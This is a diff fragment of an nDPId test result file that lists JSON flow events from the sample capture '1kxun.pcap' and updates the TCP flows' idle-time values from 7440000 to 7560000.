-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
-00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104381237,"flow_last_seen":1470104402191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2520,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104402238,"flow_last_seen":1470104408999,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104414296,"flow_last_seen":1470104423193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":997,"flow_tot_l4_payload_len":2088,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1470104423246,"flow_last_seen":1470104429322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104377754,"flow_last_seen":1470104422913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1218,"flow_tot_l4_payload_len":2048,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49597,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1470104379903,"flow_last_seen":1470104379989,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2665,"flow_avg_l4_payload_len":205,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1470104379916,"flow_last_seen":1470104380338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":33005,"flow_avg_l4_payload_len":660,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.185.35.110","src_port":49606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1470104378906,"flow_last_seen":1470104424115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":734,"flow_tot_l4_payload_len":1576,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.73.254.167","src_port":49598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00578{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104378005,"flow_last_seen":1470104378007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53622,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104381237,"flow_last_seen":1470104402191,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2520,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53623,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104402238,"flow_last_seen":1470104408999,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53625,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1470104414296,"flow_last_seen":1470104423193,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":997,"flow_tot_l4_payload_len":2088,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1470104423246,"flow_last_seen":1470104429322,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1013,"flow_tot_l4_payload_len":2516,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53629,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1470104376017,"flow_last_seen":1470104433033,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":1233,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.5.50","dst_ip":"239.255.255.250","src_port":64674,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104392072,"flow_last_seen":1470104392072,"flow_idle_time":180000,"flow_min_l4_payload_len":317,"flow_max_l4_payload_len":317,"flow_tot_l4_payload_len":317,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.140.140","dst_ip":"255.255.255.255","src_port":62976,"dst_port":62976,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -653,21 +653,21 @@ 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104399854,"flow_last_seen":1470104399854,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":100,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.0.100","dst_ip":"255.255.255.255","src_port":50925,"dst_port":5678,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104409586,"flow_last_seen":1470104409685,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::5d92:62a8:ebde:1319","dst_ip":"ff02::1:3","src_port":53938,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":43,"flow_first_seen":1470104379117,"flow_last_seen":1470104424357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":28815,"flow_avg_l4_payload_len":670,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49599,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1470104379117,"flow_last_seen":1470104424488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":59649,"flow_avg_l4_payload_len":864,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49600,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1470104379118,"flow_last_seen":1470104424418,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":48329,"flow_avg_l4_payload_len":792,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49601,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1470104379118,"flow_last_seen":1470104424446,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":45401,"flow_avg_l4_payload_len":698,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1470104379066,"flow_last_seen":1470104379115,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"8.8.8.8","src_port":60724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1470104379118,"flow_last_seen":1470104424360,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":23690,"flow_avg_l4_payload_len":696,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1470104379119,"flow_last_seen":1470104424435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":42391,"flow_avg_l4_payload_len":730,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.187.35.246","src_port":49604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1470104376816,"flow_last_seen":1470104392380,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::406:55a8:6453:25dd","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104382448,"flow_last_seen":1470104382857,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":66,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::9bd:81dd:2fdc:5750","dst_ip":"ff02::1:3","src_port":61548,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104432630,"flow_last_seen":1470104432728,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip4","src_ip":"192.168.3.236","dst_ip":"224.0.0.252","src_port":65496,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1439,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1470104378045,"flow_last_seen":1470104378454,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1470104433789,"l3_proto":"ip6","src_ip":"fe80::e98f:bae2:19f7:6b0f","dst_ip":"ff02::1:3","src_port":58779,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 